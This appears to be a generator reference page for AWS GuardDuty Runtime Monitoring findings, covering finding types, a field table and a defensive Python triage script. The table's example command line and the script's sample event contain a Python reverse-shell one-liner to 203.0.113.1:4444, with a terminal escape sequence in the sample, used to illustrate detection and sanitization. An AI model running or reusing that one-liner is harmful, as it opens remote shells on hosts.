GuardDuty Runtime Monitoring Finding Types
Threat detection based on OS-level runtime behavior
AWS GuardDuty Runtime Monitoring finding types detect threats from operating-system-level behavior on Amazon EC2 hosts and in containers running on Amazon EKS clusters, Amazon ECS workloads and Fargate tasks: malicious file execution, privilege escalation, container escape, process injection, cryptocurrency mining, command and control activity, and defense evasion techniques.
Overview
Runtime Monitoring analyzes operating-system-level behavior on EC2 hosts and in containers running on EKS, ECS and Fargate to detect malicious file execution, privilege escalation, container escape, process injection, cryptocurrency mining, command and control communication, Tor network usage, reverse shells, fileless execution and defense evasion techniques. Findings are derived from runtime telemetry collected by the GuardDuty security agent, which carries process, file and network activity context for each event.
When Generated:
- Cryptocurrency-related IP addresses queried from EC2 instance or container
- Command and control server communication detected from runtime processes
- Tor network connections detected (relay or client activity)
- Blackhole or drop point traffic patterns detected
- New binary execution detected on instance or container
- Docker socket accessed for privilege escalation
- Container escape attempts via runc or cgroups release_agent modification
- Process injection attempts detected (proc, ptrace, virtual memory write)
- Reverse shell connections initiated from instances or containers
- Fileless execution detected (code execution without disk writes)
- Cryptocurrency miner execution detected
- New libraries loaded into running processes
- Container mounting host directories detected
- Suspicious tool or command execution detected
- Ptrace anti-debugging techniques detected
- Malicious file execution detected
- Suspicious shell creation from network services
- Privilege escalation to root via suspicious setuid execution
- Kernel module loaded on EC2 instance
Security Relevance: Critical
Compliance:
Frequency Notes:
Runtime Monitoring findings vary significantly based on workload activity, container usage, and threat landscape. Production environments typically see 20-80 findings per day. Cryptocurrency mining and C&C activity are high-severity but lower frequency (5-20 per day). Process injection, container escape, and privilege escalation are critical but rare (1-10 per day). Suspicious command execution is common but lower severity (10-50 per day). Kernel module loading is very rare but critical (0-2 per day). Frequency increases during active attacks and decreases during quiet periods.
Resources
Documentation
- Runtime Monitoring Finding Types (official AWS documentation)
- Remediating Runtime Monitoring Findings (official AWS documentation)
- GuardDuty Runtime Monitoring (official AWS documentation)
- Runtime Agent Installation (official AWS documentation)
Tools
- AWS GuardDuty Console: web interface for viewing and managing Runtime Monitoring findings
- AWS Security Hub: centralized view of security findings, including GuardDuty Runtime Monitoring findings
- AWS Systems Manager: install and manage the GuardDuty runtime agent on EC2 instances
Generation Configuration
Field Definitions
Complete field reference for this event type with data types, descriptions, and example values.
| Field Name | Type | Required | Format | Description | Example | Possible Values |
|---|---|---|---|---|---|---|
| `detail.type` (source: `random_choice()` over the generator's 42 Runtime Monitoring finding types; 18 are listed here) | String | Required | `Tactic:Runtime/Technique[.Variant]` | Runtime Monitoring finding type; the prefix is the attack tactic, the `Runtime/` infix marks the data source, and the suffix names the detection | `Execution:Runtime/MaliciousFileExecuted` | `CryptoCurrency:Runtime/BitcoinTool.B` (instance or container querying an IP associated with cryptocurrency activity); `Backdoor:Runtime/C&CActivity.B` (instance or container querying an IP associated with a known C&C server); `UnauthorizedAccess:Runtime/TorRelay` (connections to the Tor network as a relay); `UnauthorizedAccess:Runtime/TorClient` (connections to a Tor Guard or Authority node); `Trojan:Runtime/BlackholeTraffic` (traffic to a remote IP known to be a black hole, i.e. traffic is silently dropped); `Trojan:Runtime/DropPoint` (traffic to a remote IP known to hold credentials and other data stolen by malware); `Execution:Runtime/NewBinaryExecuted` (newly created or modified binary executed on the instance or container); `PrivilegeEscalation:Runtime/DockerSocketAccessed` (Docker socket accessed from inside a container, a privilege escalation path); `PrivilegeEscalation:Runtime/RuncContainerEscape` (container escape attempt via runc); `PrivilegeEscalation:Runtime/CGroupsReleaseAgentModified` (cgroups release_agent file modified for container escape); `DefenseEvasion:Runtime/ProcessInjection.Proc` (process injection via the /proc filesystem); `DefenseEvasion:Runtime/ProcessInjection.Ptrace` (process injection via ptrace); `Execution:Runtime/ReverseShell` (reverse shell connection); `DefenseEvasion:Runtime/FilelessExecution` (code executed from memory without a file written to disk); `Impact:Runtime/CryptoMinerExecuted` (cryptocurrency miner executed); `Execution:Runtime/MaliciousFileExecuted` (known malicious executable run); `PrivilegeEscalation:Runtime/ElevationToRoot` (escalation to root via suspicious setuid execution); `DefenseEvasion:Runtime/KernelModuleLoaded` (kernel module loaded on an EC2 instance, indicating kernel-level access) |
| `detail.resource.resourceType` (source: `random_choice(['Instance', 'EKSCluster', 'ECSTask', 'Container'])`) | String | Required | — | Type of resource on which the runtime activity was detected | `Instance` | `Instance` (Amazon EC2 instance); `EKSCluster` (Amazon EKS cluster); `ECSTask` (Amazon ECS task); `Container` (container running on an instance or in a cluster) |
| `detail.resource.instanceDetails.instanceId` (source: `random_hex(17, 17)` with `i-` prefix) | String | Optional | `i-` followed by 17 hex characters | EC2 instance identifier (present when resourceType is Instance) | `i-1234567890abcdef0` | — |
| `detail.resource.containerDetails` (source: container metadata from the runtime environment) | Object | Optional | — | Container details (present when resourceType is Container or ECSTask) | `{containerRuntime, id, name, image, securityContext}` | — |
| `detail.service.runtimeDetails.process` (source: process metadata from the runtime agent) | Object | Required | — | Process that triggered the finding | `{name, pid, ppid, user, executablePath, commandLine}` | — |
| `detail.service.runtimeDetails.process.name` (source: process executable path from the runtime agent) | String | Required | Full path to executable | Name of the process executable | `/usr/bin/python3` | — |
| `detail.service.runtimeDetails.process.pid` (source: process ID from the operating system) | Integer | Required | Positive integer bounded by the kernel's `pid_max` (commonly 32768, or 4194304 on systems that raise it) | Process ID (PID) of the process | `1234` | — |
| `detail.service.runtimeDetails.process.ppid` (source: parent process ID from the operating system) | Integer | Required | Positive integer bounded by the kernel's `pid_max` | Parent process ID (PPID). A PPID of 1 means the parent is init/systemd, often because the original parent has already exited and the process was reparented, so the real spawning chain may need to be reconstructed from other telemetry | `1` | — |
| `detail.service.runtimeDetails.process.user` (source: user name from process credentials) | String | Required | Username | User name running the process | `root` | — |
| `detail.service.runtimeDetails.process.userId` (source: user ID from process credentials; 0 is root) | Integer | Required | Integer (typically 0-65535) | Real user ID (UID) of the process owner | `0` | — |
| `detail.service.runtimeDetails.process.euid` (source: effective user ID from process credentials) | Integer | Required | Integer (typically 0-65535) | Effective user ID (EUID) of the process. An EUID of 0 with a non-zero userId is the setuid-root pattern behind `PrivilegeEscalation:Runtime/ElevationToRoot` | `0` | — |
| `detail.service.runtimeDetails.process.parentName` (source: parent process executable path from the runtime agent) | String | Required | Full path to parent executable | Name of the parent process executable | `/usr/sbin/sshd` | — |
| `detail.service.runtimeDetails.process.executablePath.text` (source: executable file path from the runtime agent) | String | Required | Absolute file path | Full path to the process executable. Attacker-controlled: sanitize before displaying or logging | `/usr/bin/python3` | — |
| `detail.service.runtimeDetails.process.executableSha256` (source: SHA-256 hash of the executable file content) | String | Required | 64-character hexadecimal string | SHA-256 hash of the executable file; the pivot for threat-intelligence and allow-list lookups | `a1b2c3d4e5f6...` | — |
| `detail.service.runtimeDetails.process.commandLine.text` (source: process command line arguments from the runtime agent) | String | Required | Command line string | Command line used to execute the process. Attacker-controlled: sanitize before displaying or logging | `python3 -c "import socket; s=socket.socket(); s.connect((\"203.0.113.1\", 4444))"` | — |
| `detail.service.runtimeDetails.process.workingDirectory.text` (source: working directory path from the runtime agent) | String | Required | Absolute directory path | Working directory of the process. Attacker-controlled: sanitize before displaying or logging | `/tmp` | — |
| `detail.service.runtimeDetails.context.runtimeContext` (source: runtime context metadata from the runtime agent) | Object | Optional | — | Runtime context, including memory regions and address-space flags | `{addressSpaceFlags, memoryRegions, toolName}` | — |
| `detail.service.runtimeDetails.context.runtimeContext.toolName` (source: tool name identified by the runtime agent) | String | Optional | Tool name | Tool or utility used (for SuspiciousTool findings) | `curl` | — |
| `detail.service.action.networkConnectionAction.remoteIpDetails.ipAddressV4` (source: `random_public_ip()` for network connection findings) | String | Optional | IPv4 address | Remote IP address for network-based findings | `203.0.113.42` | — |
| `detail.service.action.dnsRequestAction.domain` (source: `random_choice()` of test and malicious domains for DNS findings) | String | Optional | Domain name | Domain name queried for DNS-based findings | `guarddutyc2activityb.com` | — |
| `detail.service.additionalInfo.threatListName` (source: `random_choice()` of threat intelligence list names) | String | Optional | Threat list name | Threat intelligence list that matched | `Amazon` | `Amazon` (AWS threat intelligence, includes Log4j-related threats); `ProofPoint` (ProofPoint threat intelligence feed); `Custom Threat List` (user-defined threat list); `AWS Threat Intelligence` (AWS managed threat intelligence); `Community Threat List` (community-maintained threat list) |
| `detail.service.additionalInfo.threatName` (source: `random_choice()` of threat names) | String | Optional | Threat name | Name of the specific threat identified | `C&C Server` | `C&C Server` (command and control server); `Bitcoin Mining` (cryptocurrency mining activity); `Tor Network` (Tor network node); `Log4j Related` (Log4j vulnerability exploitation); `Malicious Binary` (known malicious executable); `Container Escape` (container escape technique) |
| `detail.severity` (source: `random_choice([2, 2, 5, 5, 5, 8, 8, 8])`, i.e. 25% Low, 37.5% Medium, 37.5% High) | Integer | Required | 0-10 (the generator emits integers; GuardDuty itself emits a decimal score) | Finding severity, which GuardDuty bands as Low (1.0-3.9), Medium (4.0-6.9) and High (7.0-8.9) | `8` | `2` (Low; e.g. SuspiciousShellCreated, `Discovery:Runtime/SuspiciousCommand`); `5` (Medium; e.g. ElevationToRoot, `Persistence:Runtime/SuspiciousCommand`); `8` (High; e.g. MaliciousFileExecuted, C&CActivity, TorClient, KernelModuleLoaded) |
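The field reference above is most useful when a consumer actually parses a finding off the EventBridge bus. The following is an added example written for this page, not code from the generator or from AWS: it triages one constructed Runtime Monitoring event laid out per the table, splits `detail.type` into tactic and technique, reconstructs the process chain from `parentName`/`ppid` and `executablePath`/`pid`, flags the setuid-root pattern (`euid` 0 with a non-zero `userId`), and sanitizes the attacker-controlled strings (`commandLine`, `executablePath`, `workingDirectory`) before they reach a log or ticket, since the sample command line deliberately ends in a terminal escape sequence. The sample event, the `sanitize`/`triage` helper names and the `ISOLATE_TECHNIQUES` containment mapping are this example's own assumptions, not an AWS API or recommendation.

```python
"""Triage a GuardDuty Runtime Monitoring finding as delivered by EventBridge.
Added example, not this page's generator or any AWS SDK: the event is a constructed
sample following the field layout above; the containment mapping is an assumption."""
import json
import re
from dataclasses import dataclass, asdict
from typing import Optional

# Constructed sample (not a real finding); the command line ends in a terminal escape.
SAMPLE_EVENT = {
    "detail": {
        "type": "Execution:Runtime/ReverseShell", "severity": 8,
        "resource": {"resourceType": "Instance",
                     "instanceDetails": {"instanceId": "i-1234567890abcdef0"}},
        "service": {
            "runtimeDetails": {"process": {
                "name": "/usr/bin/python3", "pid": 1234, "ppid": 987,
                "user": "www-data", "userId": 33, "euid": 33,
                "parentName": "/usr/sbin/apache2",
                "executablePath": {"text": "/usr/bin/python3"},
                "executableSha256": "a1b2" * 16,
                "commandLine": {"text": "python3 -c 'import socket;s=socket.socket();"
                                        "s.connect((\"203.0.113.1\",4444))'\x1b[2J\r"},
                "workingDirectory": {"text": "/tmp"},
            }},
            "action": {"networkConnectionAction": {
                "remoteIpDetails": {"ipAddressV4": "203.0.113.1"}}},
        },
    },
}

# ANSI CSI sequences (ESC [ params intermediates final) or any other C0/DEL byte.
_CONTROL = re.compile(r"\x1b\[[0-?]*[ -/]*[@-~]|[\x00-\x1f\x7f]")

def sanitize(text: str, limit: int = 512) -> str:
    """Strip terminal escapes/control bytes from commandLine, executablePath or
    workingDirectory and cap the length so a huge argv cannot flood a log line."""
    cleaned = _CONTROL.sub("", text)
    return cleaned if len(cleaned) <= limit else cleaned[:limit] + "...[truncated]"

def severity_band(score: float) -> str:
    """GuardDuty's scale: Low 1.0-3.9, Medium 4.0-6.9, High 7.0-8.9, Critical 9.0-10."""
    for floor, band in ((9.0, "Critical"), (7.0, "High"), (4.0, "Medium"), (1.0, "Low")):
        if score >= floor:
            return band
    return "Unscored"

def split_type(finding_type: str):
    """'Backdoor:Runtime/C&CActivity.B' -> ('Backdoor', 'C&CActivity'); variant dropped."""
    tactic, _, rest = finding_type.partition(":")
    return tactic, rest.split("/", 1)[-1].split(".", 1)[0]

# Editor's containment convention (assumption): an interactive foothold or host-level
# compromise means isolate the workload and capture memory/disk before any cleanup.
ISOLATE_TECHNIQUES = {"ReverseShell", "C&CActivity", "RuncContainerEscape",
                      "CGroupsReleaseAgentModified", "DockerSocketAccessed",
                      "KernelModuleLoaded", "CryptoMinerExecuted"}

@dataclass
class Triage:
    tactic: str
    technique: str
    band: str
    resource: str
    process_chain: str
    command_line: str
    remote_ip: Optional[str]
    setuid_root: bool
    action: str

def triage(event: dict) -> Triage:
    detail = event["detail"]
    tactic, technique = split_type(detail["type"])
    band = severity_band(float(detail.get("severity", 0)))
    res, cd = detail.get("resource", {}), detail.get("resource", {}).get("containerDetails", {})
    rtype = res.get("resourceType", "Unknown")
    ident = (res.get("instanceDetails", {}).get("instanceId") if rtype == "Instance"
             else cd.get("name") or cd.get("id"))
    proc = detail["service"]["runtimeDetails"]["process"]
    # Real UID non-zero with effective UID 0: the setuid-root pattern behind ElevationToRoot.
    setuid_root = proc.get("euid") == 0 and proc.get("userId") not in (0, None)
    exe = proc.get("executablePath", {}).get("text") or proc.get("name", "?")
    chain = (f"{sanitize(proc.get('parentName', '?'))}[{proc.get('ppid', '?')}] -> "
             f"{sanitize(exe)}[{proc.get('pid', '?')}] as {proc.get('user', '?')} "
             f"(uid={proc.get('userId', '?')}, euid={proc.get('euid', '?')}) "
             f"cwd={sanitize(proc.get('workingDirectory', {}).get('text', '?'))}")
    remote_ip = (detail["service"].get("action", {}).get("networkConnectionAction", {})
                 .get("remoteIpDetails", {}).get("ipAddressV4"))
    if technique in ISOLATE_TECHNIQUES:
        action = "isolate-and-capture"
    elif band in ("High", "Critical") or setuid_root:
        action = "page-oncall"
    else:
        action = "ticket" if band == "Medium" else "log-only"
    return Triage(tactic, technique, band, f"{rtype} {ident or '?'}", chain,
                  sanitize(proc.get("commandLine", {}).get("text", "")),
                  remote_ip, setuid_root, action)

if __name__ == "__main__":
    print(json.dumps(asdict(triage(SAMPLE_EVENT)), indent=2))
```

Run as a script it prints the triage record for the sample; in a Lambda subscribed to the GuardDuty EventBridge rule, `triage(event)` would be called on the delivered event. The variant suffix (`.B`, `.Proc`, `.Ptrace`) is dropped before the playbook lookup so that a new variant of a known technique still routes to the same response, and the `ppid` is carried alongside `parentName` because a PPID of 1 usually means the real parent has already exited.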